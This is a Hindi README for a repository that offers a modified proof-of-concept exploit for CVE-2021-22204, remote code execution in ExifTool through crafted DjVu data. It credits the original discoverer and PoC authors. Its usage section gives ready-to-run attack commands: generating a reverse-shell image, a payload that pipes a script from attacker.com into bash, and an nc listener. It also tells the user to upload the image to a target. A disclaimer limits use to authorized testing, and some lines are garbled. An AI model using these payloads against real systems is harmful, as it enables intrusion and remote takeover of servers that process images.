
ExifTool RCE exploit (CVE-2021-22204) - बेहतर संस्करण, कोई exiftool निर्भरता नहीं
CVE-2021-22204 के लिए एक उन्नत प्रूफ-ऑफ-कॉन्सेप्ट, जो ExifTool संस्करण 7.44 से 12.23 में एक भेद्यता है जो दुर्भावनापूर्ण DjVu फ़ाइलों को संसाधित करते समय मनमाना कोड निष्पादन की अनुमति देती है।
यह व्युत्पन्न कार्य है। भेद्यता और मूल शोषण मेरे नहीं हैं।
| भूमिका | कौन |
|---|---|
| भेद्यता की खोज किसके द्वारा की गई | William Bowling (@wcbowling), GitLab बग बाउंटी कार्यक्रम के माध्यम से रिपोर्ट की गई — अप्रैल 2021 |
| मूल PoC किसके द्वारा | UNICORD (NicPWNs & Dev-Yeoj) |
| इस रिपॉजिटरी में संशोधन किसके द्वारा | d4ytox |
ExifTool संस्करण 7.44 से 12.23 में DjVu फ़ाइल प्रारूप में उपयोगकर्ता डेटा का अनुचित न्यूट्रलाइज़ेशन, दुर्भावनापूर्ण छवि को पार्स करते समय मनमाना कोड निष्पादन की अनुमति देता है। यह शोषण एक दुर्भावनापूर्ण छवि फ़ाइल उत्पन्न करता है, जिसे संसाधित करने पर, एक भेद्य ExifTool संस्करण, हमलावर-नियंत्रित कोड निष्पादित करता है।
UNICORDev/exploit-CVE-2021-22204 पर आधारित:
exiftool -config का उपयोग करता है, जो विफल हो जाता है यदि आपका अपना ExifTool पैच किया गया है (v12.24+)। यह संस्करण केवल djvumake का उपयोग करके एक शुद्ध DjVu पेलोड बनाता है।\c एस्केप अनुक्रम चेतावनी को ठीक करता है)djvulibre-bin पैकेज की आवश्यकता हैये एक मौजूदा शोषण में इंजीनियरिंग परिवर्तन हैं। कोई भेद्यता अनुसंधान का दावा नहीं किया गया है।
sudo apt install djvulibre-bin
रिवर्स शेल:
python3 exploit.py -s <LHOST> <LPORT>
कस्टम कमांड:
python3 exploit.py -c "id > /tmp/pwned"
उदाहरण:
# रिवर्स शेल पेलोड उत्पन्न करें
python3 exploit.py -s 192.168.1.100 4444
# कमांड निष्पादन पेलोड उत्पन्न करें
python3 exploit.py -c "curl http://attacker.com/shell.sh | bash"
# लिसनर शुरू करें और कॉलबैक की प्रतीक्षा करें
nc -nlvp 4444
शोषण image.jpg उत्पन्न करता है - इसे एक लक्ष्य पर अपलोड करें जहाँ ExifTool इसे संसाधित करेगा।
यह उपकरण केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है।
लेखक इस उपकरण के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है। इस शोषण का उपयोग केवल उन प्रणालियों के विरुद्ध करें जिनके स्वामी आप हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति है।
कंप्यूटर प्रणालियों तक अनधिकृत पहुँच अवैध है और कानून द्वारा दंडनीय है। जिम्मेदारी से उपयोग करें।
MIT, केवल इस रिपॉजिटरी में संशोधनों पर लागू। अपस्ट्रीम PoC कोई लाइसेंस नहीं रखता है, इसलिए यह अपने लेखकों द्वारा सर्वाधिकार सुरक्षित रहता है। पूर्ण एट्रिब्यूशन सूचना के लिए LICENSE देखें।